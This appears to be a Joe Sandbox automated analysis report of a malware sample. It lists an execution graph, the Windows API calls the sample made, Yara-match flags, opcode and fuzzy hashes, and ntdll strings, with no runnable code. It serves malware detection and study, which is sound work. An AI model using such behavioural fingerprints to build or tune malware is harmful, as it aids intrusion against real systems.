                                                                  execution_graph 92219 424bc3 92220 424bdf 92219->92220 92221 424c07 92220->92221 92222 424c1b 92220->92222 92223 42c8d3 NtClose 92221->92223 92229 42c8d3 92222->92229 92225 424c10 92223->92225 92226 424c24 92232 42ea93 RtlAllocateHeap 92226->92232 92228 424c2f 92230 42c8f0 92229->92230 92231 42c901 NtClose 92230->92231 92231->92226 92232->92228 92238 424f53 92243 424f6c 92238->92243 92239 424fff 92240 424fb7 92246 42e973 92240->92246 92243->92239 92243->92240 92244 424ffa 92243->92244 92245 42e973 RtlFreeHeap 92244->92245 92245->92239 92249 42cc43 92246->92249 92248 424fc7 92250 42cc60 92249->92250 92251 42cc71 RtlFreeHeap 92250->92251 92251->92248 92252 42fa13 92253 42fa23 92252->92253 92254 42fa29 92252->92254 92257 42ea53 92254->92257 92256 42fa4f 92260 42cbf3 92257->92260 92259 42ea6e 92259->92256 92261 42cc10 92260->92261 92262 42cc21 RtlAllocateHeap 92261->92262 92262->92259 92263 42bed3 92264 42bef0 92263->92264 92267 14e2df0 LdrInitializeThunk 92264->92267 92265 42bf18 92267->92265 92268 413d73 92269 413d95 92268->92269 92271 42cb63 92268->92271 92272 42cb80 92271->92272 92275 14e2c70 LdrInitializeThunk 92272->92275 92273 42cba8 92273->92269 92275->92273 92276 41a833 92277 41a8a5 92276->92277 92278 41a84b 92276->92278 92278->92277 92280 41e753 92278->92280 92281 41e779 92280->92281 92287 41e879 92281->92287 92289 42fb43 92281->92289 92283 41e80e 92285 41e870 92283->92285 92283->92287 92300 42bf23 92283->92300 92285->92287 92295 428b53 92285->92295 92287->92277 92288 41e931 92288->92277 92290 42fab3 92289->92290 92291 42fb10 92290->92291 92292 42ea53 RtlAllocateHeap 92290->92292 92291->92283 92293 42faed 92292->92293 92294 42e973 RtlFreeHeap 92293->92294 92294->92291 92296 428bb8 92295->92296 92297 428bf3 92296->92297 92304 418e23 92296->92304 92297->92288 92299 428bd5 92299->92288 92301 42bf40 92300->92301 92311 14e2c0a 92301->92311 92302 42bf6c 92302->92285 92305 418dbf 92304->92305 92307 418e0b 92304->92307 92308 42cc93 92305->92308 92307->92299 92309 42ccb0 92308->92309 92310 42ccc1 ExitProcess 92309->92310 92310->92307 92312 14e2c1f LdrInitializeThunk 92311->92312 92313 14e2c11 92311->92313 92312->92302 92313->92302 92314 4142d3 92315 4142ec 92314->92315 92320 417a73 92315->92320 92317 41430a 92318 414356 92317->92318 92319 414343 PostThreadMessageW 92317->92319 92319->92318 92321 417a97 92320->92321 92322 417a9e 92321->92322 92324 417abd 92321->92324 92327 42fdf3 LdrLoadDll 92321->92327 92322->92317 92325 417ad3 LdrLoadDll 92324->92325 92326 417aea 92324->92326 92325->92326 92326->92317 92327->92324 92328 41b593 92329 41b5d7 92328->92329 92330 42c8d3 NtClose 92329->92330 92331 41b5f8 92329->92331 92330->92331 92332 414416 92333 414419 92332->92333 92334 4143af 92332->92334 92335 414342 PostThreadMessageW 92334->92335 92336 414356 92334->92336 92335->92336 92233 418f48 92236 418f49 92233->92236 92234 418f01 92235 42c8d3 NtClose 92235->92234 92236->92234 92236->92235 92337 4019dc 92338 4019f1 92337->92338 92338->92338 92341 42fee3 92338->92341 92344 42e523 92341->92344 92345 42e549 92344->92345 92356 407273 92345->92356 92347 42e55f 92348 401afd 92347->92348 92359 41b3a3 92347->92359 92350 42e57e 92351 42e593 92350->92351 92352 42cc93 ExitProcess 92350->92352 92370 428463 92351->92370 92352->92351 92354 42e5ad 92355 42cc93 ExitProcess 92354->92355 92355->92348 92374 416723 92356->92374 92358 407280 92358->92347 92360 41b3cf 92359->92360 92385 41b293 92360->92385 92363 41b3fc 92364 41b407 92363->92364 92367 42c8d3 NtClose 92363->92367 92364->92350 92365 41b414 92366 41b430 92365->92366 92368 42c8d3 NtClose 92365->92368 92366->92350 92367->92364 92369 41b426 92368->92369 92369->92350 92371 4284c5 92370->92371 92373 4284d2 92371->92373 92396 4188e3 92371->92396 92373->92354 92375 41673d 92374->92375 92377 416756 92375->92377 92378 42d313 92375->92378 92377->92358 92379 42d32d 92378->92379 92380 42d35c 92379->92380 92381 42bf23 LdrInitializeThunk 92379->92381 92380->92377 92382 42d3b9 92381->92382 92383 42e973 RtlFreeHeap 92382->92383 92384 42d3d2 92383->92384 92384->92377 92386 41b2ad 92385->92386 92390 41b389 92385->92390 92391 42bfc3 92386->92391 92389 42c8d3 NtClose 92389->92390 92390->92363 92390->92365 92392 42bfdd 92391->92392 92395 14e35c0 LdrInitializeThunk 92392->92395 92393 41b37d 92393->92389 92395->92393 92398 41890d 92396->92398 92397 418e0b 92397->92373 92398->92397 92404 413f53 92398->92404 92400 418a34 92400->92397 92401 42e973 RtlFreeHeap 92400->92401 92402 418a4c 92401->92402 92402->92397 92403 42cc93 ExitProcess 92402->92403 92403->92397 92408 413f73 92404->92408 92406 413fdc 92406->92400 92407 413fd2 92407->92400 92408->92406 92409 41b6b3 RtlFreeHeap LdrInitializeThunk 92408->92409 92409->92407 92237 14e2b60 LdrInitializeThunk

                                                                  Executed Functions

                                                                  Function 00417A73 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 222 417a73-417a8f 223 417a97-417a9c 222->223 224 417a92 call 42f553 222->224 225 417aa2-417ab0 call 42fb53 223->225 226 417a9e-417aa1 223->226 224->223 229 417ac0-417ad1 call 42dff3 225->229 230 417ab2-417abd call 42fdf3 225->230 236 417ad3-417ae7 LdrLoadDll 229->236 237 417aea-417aed 229->237 230->229 236->237
                                                                  APIs
                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417AE5
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1631865087.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_400000_ZcshRk2lgh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Load
                                                                  • String ID:
                                                                  • API String ID: 2234796835-0
                                                                  • Opcode ID: f7aca7ff22897dbe4d74d0a4087b515c599850f7e07237e5203b5d3da9a5bb0d
                                                                  • Instruction ID: 3da9ad656e2a33d7f058596d6c0db2f8ecc23348adbfd370e033ddd8e755fe76
                                                                  • Opcode Fuzzy Hash: f7aca7ff22897dbe4d74d0a4087b515c599850f7e07237e5203b5d3da9a5bb0d
                                                                  • Instruction Fuzzy Hash: EC0152B1E0010DBBDF10DAA5DC42FDEB778AF54308F4481A6E90897240F674EB588755
                                                                  Function 0042C8D3 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 248 42c8d3-42c90f call 404663 call 42db03 NtClose
                                                                  APIs
                                                                  • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C90A
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1631865087.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_400000_ZcshRk2lgh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Close
                                                                  • String ID:
                                                                  • API String ID: 3535843008-0
                                                                  • Opcode ID: 865acb2d5640172cea7701e8b8a714ff6b9d74cb1f623fdfa03c7267b3d5827b
                                                                  • Instruction ID: edcd4929374db9964348cfcf96216c1e7e48739ffbccb93e989d5216367ee6f6
                                                                  • Opcode Fuzzy Hash: 865acb2d5640172cea7701e8b8a714ff6b9d74cb1f623fdfa03c7267b3d5827b
                                                                  • Instruction Fuzzy Hash: CCE04F752042147BC220EA6ADC41FAB775CDFC6714F108419FA4977241C7757910C7F4
                                                                  Function 014E2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 262 14e2b60-14e2b6c LdrInitializeThunk
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 30848a622e99c84f414daa2abdf43356d95c5cef2d9e2658dcaec0dcbd28a54d
                                                                  • Instruction ID: a4175c3bf45c4cc275ece34eeff2e3884f887386091a8f3d066957cdcc2c2f79
                                                                  • Opcode Fuzzy Hash: 30848a622e99c84f414daa2abdf43356d95c5cef2d9e2658dcaec0dcbd28a54d
                                                                  • Instruction Fuzzy Hash: 6F90026160240103450571584414616400AD7F1201B55C026E20149A1DC735C9A56225
                                                                  Function 014E2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 00ab63f9ef8e81966b746e13758ab361d59b5ba028144b38ce8ba2053dde1a37
                                                                  • Instruction ID: 3305dd07d73b873dc2e0dd5e19a4ddccff7a46ea07299f00a924cf8dcf54441f
                                                                  • Opcode Fuzzy Hash: 00ab63f9ef8e81966b746e13758ab361d59b5ba028144b38ce8ba2053dde1a37
                                                                  • Instruction Fuzzy Hash: 9390023160140513D511715845047070009D7E1241F95C417A1424969DD766CA66A221
                                                                  Function 014E2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 263 14e2c70-14e2c7c LdrInitializeThunk
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 68db07dc0413c28bfcd5d67128c8c44dc3fcf7565a39dcd86976cfc812391763
                                                                  • Instruction ID: ecd51ec0050181a322ee9f8916a87e5033f5175dd079c565bf67f57234276cb3
                                                                  • Opcode Fuzzy Hash: 68db07dc0413c28bfcd5d67128c8c44dc3fcf7565a39dcd86976cfc812391763
                                                                  • Instruction Fuzzy Hash: 9B90023160148902D5107158840474A0005D7E1301F59C416A5424A69DC7A5C9A57221
                                                                  Function 014E35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 1d76cb490cd479af85c2dc59b4abf1ef77b0aab7e5086bfc0fe5cb3614edc206
                                                                  • Instruction ID: dbc346b5496f0770e227035629f61bc7b46cf938a7504d01c6d0c8ef29ec9535
                                                                  • Opcode Fuzzy Hash: 1d76cb490cd479af85c2dc59b4abf1ef77b0aab7e5086bfc0fe5cb3614edc206
                                                                  • Instruction Fuzzy Hash: 80900231A0550502D500715845147061005D7E1201F65C416A1424979DC7A5CA6566A2
                                                                  Function 0041422D Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 62COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 0 41422d-414237 1 414271-414274 0->1 2 414239-414240 0->2 3 414242-41424c 2->3 4 414289-41429e 2->4 3->1 5 4142a0-4142b8 4->5 6 41431f-414341 4->6 5->6 7 414363-414368 6->7 8 414343-414354 PostThreadMessageW 6->8 8->7 9 414356-414360 8->9 9->7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1631865087.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_400000_ZcshRk2lgh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: +Yf$7046-nn1K$7046-nn1K
                                                                  • API String ID: 0-152878582
                                                                  • Opcode ID: 8835f3a4d3a980d73cac9d5451b61f837560031cbaac1f6e90a95f3aac6059d8
                                                                  • Instruction ID: c275fd484e462aee15a3afa9325c1543472fcda4a2c72e174b33f2e44c37e21e
                                                                  • Opcode Fuzzy Hash: 8835f3a4d3a980d73cac9d5451b61f837560031cbaac1f6e90a95f3aac6059d8
                                                                  • Instruction Fuzzy Hash: 1B118C71B853576ACB02CEA08C81BDDB7649F92B00F0486EBE9449F6C1D3B58D878795
                                                                  Function 004142D3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • PostThreadMessageW.USER32(7046-nn1K,00000111,00000000,00000000), ref: 00414350
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1631865087.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_400000_ZcshRk2lgh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: MessagePostThread
                                                                  • String ID: 7046-nn1K$7046-nn1K
                                                                  • API String ID: 1836367815-59622768
                                                                  • Opcode ID: 08cef4079501bae7446cdd3a4563593f3a3346a9b3449423cb903043dd6c050e
                                                                  • Instruction ID: 516b92e160089bb7b3fe599ab1603a73bfc270ec1e4e33151ab2bbf8a00857f9
                                                                  • Opcode Fuzzy Hash: 08cef4079501bae7446cdd3a4563593f3a3346a9b3449423cb903043dd6c050e
                                                                  • Instruction Fuzzy Hash: FA010831E4021876DB20AB919C02FDF7B7C9F80B04F008016FB147B2C0D6BC570687A9
                                                                  Function 00414416 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 28 414416-414417 29 414419-414428 28->29 30 4143af 28->30 31 4143b1 30->31 32 414365-414368 30->32 33 4143b3-4143c0 31->33 34 414342-414354 PostThreadMessageW 31->34 36 4143c3-4143c6 33->36 37 414363-414364 34->37 38 414356-414360 34->38 39 4143e6-4143ea 36->39 40 4143c8-4143cc 36->40 37->32 38->37 39->36 41 4143ec-4143f0 39->41 40->39 42 4143ce-4143d2 40->42 42->39 43 4143d4-4143d8 42->43 43->39 44 4143da-4143de 43->44 44->39 45 4143e0-4143e4 44->45 45->39 46 4143f1-414401 45->46
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1631865087.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_400000_ZcshRk2lgh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 7046-nn1K$7046-nn1K
                                                                  • API String ID: 0-59622768
                                                                  • Opcode ID: a47dd1c92f441ef4c73ff5499db73bb119073945b9849f7dce625e1cc4a0970a
                                                                  • Instruction ID: c4b73eb21b230dc31030ab9c1f53721eb1c4f484e884d00b70ebd9f1df3f4591
                                                                  • Opcode Fuzzy Hash: a47dd1c92f441ef4c73ff5499db73bb119073945b9849f7dce625e1cc4a0970a
                                                                  • Instruction Fuzzy Hash: 9701267578E28C2DFF31DA6068C1EE27F089782708F0881DFDD689F283D94A59865355
                                                                  Function 00417AF3 Relevance: 1.6, APIs: 1, Instructions: 62libraryloaderCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 212 417af3-417b2b 214 417b2c-417b37 212->214 214->214 215 417b39-417b40 214->215 216 417b42 215->216 217 417ac4-417ad1 call 42dff3 215->217 220 417ad3-417ae7 LdrLoadDll 217->220 221 417aea-417aed 217->221 220->221
                                                                  APIs
                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417AE5
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1631865087.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_400000_ZcshRk2lgh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Load
                                                                  • String ID:
                                                                  • API String ID: 2234796835-0
                                                                  • Opcode ID: 8d41206cb82bf2de7a09805619e6fe61e886688f6cc38260023a6cbf9ed9e3a9
                                                                  • Instruction ID: 974bac3e534c670f7ac2524caa8da76db0f880a9a0dc8598db73eafaeed0b4e5
                                                                  • Opcode Fuzzy Hash: 8d41206cb82bf2de7a09805619e6fe61e886688f6cc38260023a6cbf9ed9e3a9
                                                                  • Instruction Fuzzy Hash: 5A019C36A0810C7FCF10DAA4DC429EE7B78DF41285F040659D685E7201E632B64F8789
                                                                  Function 0042CBF3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 238 42cbf3-42cc37 call 404663 call 42db03 RtlAllocateHeap
                                                                  APIs
                                                                  • RtlAllocateHeap.NTDLL(?,0041E80E,?,?,00000000,?,0041E80E,?,?,?), ref: 0042CC32
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1631865087.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_400000_ZcshRk2lgh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocateHeap
                                                                  • String ID:
                                                                  • API String ID: 1279760036-0
                                                                  • Opcode ID: 9a88fbf9543032f2133e8a9cac2bb7711bd7b960dc0391e09488a6e464b12435
                                                                  • Instruction ID: 2846fa4b3233f60a92fef8d27f7aa413956122f50d55b758d752c0d3958e743e
                                                                  • Opcode Fuzzy Hash: 9a88fbf9543032f2133e8a9cac2bb7711bd7b960dc0391e09488a6e464b12435
                                                                  • Instruction Fuzzy Hash: 28E06DB12082097BCA10EE59DC41FAB37ACEFC5714F004419FA08A7241DB74B91087B8
                                                                  Function 0042CC43 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 243 42cc43-42cc87 call 404663 call 42db03 RtlFreeHeap
                                                                  APIs
                                                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,33F84D8B,00000007,00000000,00000004,00000000,004172DE,000000F4), ref: 0042CC82
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1631865087.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_400000_ZcshRk2lgh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: FreeHeap
                                                                  • String ID:
                                                                  • API String ID: 3298025750-0
                                                                  • Opcode ID: f35c0bb0e5c2be9d201f2d5a3767015d53e8d38ac539a827b4e54993e6d9bddc
                                                                  • Instruction ID: cc980803f6f00e9c11348fd80cdf1fb29ca32894386c6b15e328b1e50aae6e2f
                                                                  • Opcode Fuzzy Hash: f35c0bb0e5c2be9d201f2d5a3767015d53e8d38ac539a827b4e54993e6d9bddc
                                                                  • Instruction Fuzzy Hash: 80E092B12142087BD610EF59DC41FDB3BACEFC5710F004419FA08A7241D775B9108BB8
                                                                  Function 0042CC93 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 253 42cc93-42cccf call 404663 call 42db03 ExitProcess
                                                                  APIs
                                                                  • ExitProcess.KERNEL32(?,00000000,00000000,?,6995A257,?,?,6995A257), ref: 0042CCCA
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1631865087.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_400000_ZcshRk2lgh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ExitProcess
                                                                  • String ID:
                                                                  • API String ID: 621844428-0
                                                                  • Opcode ID: 67cb749b5959da813ff9cc8226a13492c2e86e24a442318dac2c5c70b4266204
                                                                  • Instruction ID: ac3c5cb8458b9ec8aaad2dc6460039598258f1f05cf85b266bad946a97558dfc
                                                                  • Opcode Fuzzy Hash: 67cb749b5959da813ff9cc8226a13492c2e86e24a442318dac2c5c70b4266204
                                                                  • Instruction Fuzzy Hash: 38E086356002147BD110EB6ADC41FD7776CDFC6710F004519FA48A7242C675790187F5
                                                                  Function 014E2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 258 14e2c0a-14e2c0f 259 14e2c1f-14e2c26 LdrInitializeThunk 258->259 260 14e2c11-14e2c18 258->260
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: e933643d2bd402a1c70d2beb2c9b76b129c67b5768589a95e4d345f28badb75c
                                                                  • Instruction ID: 7627eb4da1eeec7efbf268b741abcc1eeb06c3414949976c7f439cf47671bffd
                                                                  • Opcode Fuzzy Hash: e933643d2bd402a1c70d2beb2c9b76b129c67b5768589a95e4d345f28badb75c
                                                                  • Instruction Fuzzy Hash: 37B09B71D015C5C5DE11E764460CB177954B7D1701F15C167D3030653F4778C1E5E275

                                                                  Non-executed Functions

                                                                  Function 01522349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 0-2160512332
                                                                  • Opcode ID: 0b44cd157f8c513f2629ee80b4c8092ecd2f7c9e00c1484ec683c9d2d73f0aef
                                                                  • Instruction ID: d7302e2a642c7618318dfde74e668421b1043f02cde5208e84bd3a47bbaa8e45
                                                                  • Opcode Fuzzy Hash: 0b44cd157f8c513f2629ee80b4c8092ecd2f7c9e00c1484ec683c9d2d73f0aef
                                                                  • Instruction Fuzzy Hash: C092C3766083529FE721DF29C880F6BB7E8BB85710F14491EFA94DB2A0D770E844CB52
                                                                  Function 014D8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • Invalid debug info address of this critical section, xrefs: 015154B6
                                                                  • double initialized or corrupted critical section, xrefs: 01515508
                                                                  • Critical section debug info address, xrefs: 0151541F, 0151552E
                                                                  • Critical section address., xrefs: 01515502
                                                                  • Thread identifier, xrefs: 0151553A
                                                                  • undeleted critical section in freed memory, xrefs: 0151542B
                                                                  • Address of the debug info found in the active list., xrefs: 015154AE, 015154FA
                                                                  • 8, xrefs: 015152E3
                                                                  • corrupted critical section, xrefs: 015154C2
                                                                  • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015154CE
                                                                  • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015154E2
                                                                  • Thread is in a state in which it cannot own a critical section, xrefs: 01515543
                                                                  • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0151540A, 01515496, 01515519
                                                                  • Critical section address, xrefs: 01515425, 015154BC, 01515534
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                  • API String ID: 0-2368682639
                                                                  • Opcode ID: 570a105855547e9f11150c6e91796e8d34d89d424b69604352f31710c99cd996
                                                                  • Instruction ID: cbf00edc6d1f5be00919fbfcaea24ce6cd813a275f4c04b1b1da8554aa43631d
                                                                  • Opcode Fuzzy Hash: 570a105855547e9f11150c6e91796e8d34d89d424b69604352f31710c99cd996
                                                                  • Instruction Fuzzy Hash: 0B81AFB1A40349AFEF21CF99C844FAEBBF5BB49714F60411AF504BB260E3B1A945CB50
                                                                  Function 014D29F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01512624
                                                                  • @, xrefs: 0151259B
                                                                  • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01512498
                                                                  • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01512412
                                                                  • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 015124C0
                                                                  • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01512602
                                                                  • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01512506
                                                                  • RtlpResolveAssemblyStorageMapEntry, xrefs: 0151261F
                                                                  • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 015122E4
                                                                  • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01512409
                                                                  • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 015125EB
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
